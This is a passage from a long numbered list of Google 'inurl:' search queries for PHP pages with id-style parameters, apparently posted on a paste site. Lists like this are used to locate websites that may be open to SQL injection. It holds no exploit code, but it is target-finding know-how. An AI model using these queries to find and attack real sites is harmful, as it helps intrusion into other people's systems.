  9849. inurl:download.php?id=
  9850. inurl:main.php?id=
  9851. inurl:review.php?id=
  9852. inurl:chappies.php?id=
  9853. inurl:read.php?id=
  9854. inurl:prod_detail.php?id=
  9855. inurl:viewphoto.php?id=
  9856. inurl:article.php?id=
  9857. inurl:person.php?id=
  9858. inurl:productinfo.php?id=
  9859. inurl:showimg.php?id=
  9860. inurl:view.php?id=
  9861. inurl:website.php?id=
  9862. inurl:hosting_info.php?id=
  9863. inurl:gallery.php?id=
  9864. inurl:rub.php?idr=
  9865. inurl:view_faq.php?id=
  9866. inurl:artikelinfo.php?id=
  9867. inurl:detail.php?ID=
  9868. inurl:index.php?=
  9869. inurl:profile_view.php?id=
  9870. inurl:category.php?id=
  9871. inurl:publications.php?id=
  9872. inurl:fellows.php?id=
  9873. inurl:downloads_info.php?id=
  9874. inurl:prod_info.php?id=
  9875. inurl:shop.php?do=part&id=
  9876. inurl:productinfo.php?id=
  9877. inurl:collectionitem.php?id=
  9878. inurl:band_info.php?id=
  9879. inurl:product.php?id=
  9880. inurl:releases.php?id=
  9881. inurl:ray.php?id=
  9882. inurl:produit.php?id=
  9883. inurl:pop.php?id=
  9884. inurl:shopping.php?id=
  9885. inurl:productdetail.php?id=
  9886. inurl:post.php?id=
  9887. inurl:viewshowdetail.php?id=
  9888. inurl:clubpage.php?id=
  9889. inurl:memberInfo.php?id=
  9890. inurl:section.php?id=
  9891. inurl:theme.php?id=
  9892. inurl:page.php?id=
  9893. inurl:shredder-categories.php?id=
  9894. inurl:tradeCategory.php?id=
  9895. inurl:product_ranges_view.php?ID=
  9896. inurl:shop_category.php?id=
  9897. inurl:transcript.php?id=
  9898. inurl:channel_id=
  9899. inurl:item_id=
  9900. inurl:newsid=
  9901. inurl:trainers.php?id=
  9902. inurl:news-full.php?id=
  9903. inurl:news_display.php?getid=
  9904. inurl:index2.php?option=
  9905. inurl:readnews.php?id=
  9906. inurl:top10.php?cat=
  9907. inurl:newsone.php?id=
  9908. inurl:event.php?id=
  9909. inurl:product-item.php?id=
  9910. inurl:sql.php?id=
  9911. inurl:aboutbook.php?id=
  9912. inurl:preview.php?id=
  9913. inurl:loadpsb.php?id=
  9914. inurl:pages.php?id=
  9915. inurl:material.php?id=
  9916. inurl:clanek.php4?id=
  9917. inurl:announce.php?id=
  9918. inurl:chappies.php?id=
  9919. inurl:read.php?id=
  9920. inurl:viewapp.php?id=
  9921. inurl:viewphoto.php?id=
  9922. inurl:rub.php?idr=
  9923. inurl:galeri_info.php?l=
  9924. inurl:review.php?id=
  9925. inurl:iniziativa.php?in=
  9926. inurl:curriculum.php?id=
  9927. inurl:labels.php?id=
  9928. inurl:story.php?id=
  9929. inurl:look.php?ID=
  9930. inurl:newsone.php?id=
  9931. inurl:aboutbook.php?id=
  9932. inurl:material.php?id=
  9933. inurl:opinions.php?id=
  9934. inurl:announce.php?id=
  9935. inurl:rub.php?idr=
  9936. inurl:galeri_info.php?l=
  9937. inurl:tekst.php?idt=
  9938. inurl:newscat.php?id=
  9939. inurl:newsticker_info.php?idn=
  9940. inurl:rubrika.php?idr=
  9941. inurl:rubp.php?idr=
  9942. inurl:offer.php?idf=
  9943. inurl:art.php?idm=
  9944. inurl:title.php?id=
  9945. inurl:”.php?id=1″
  9946. inurl:”.php?cat=1″
  9947. inurl:”.php?catid=1″
  9948. inurl:”.php?num=1″
  9949. inurl:”.php?bid=1″
  9950. inurl:”.php?pid=1″
  9951. inurl:”.php?nid=1″
Add Comment
Please, Sign In to add comment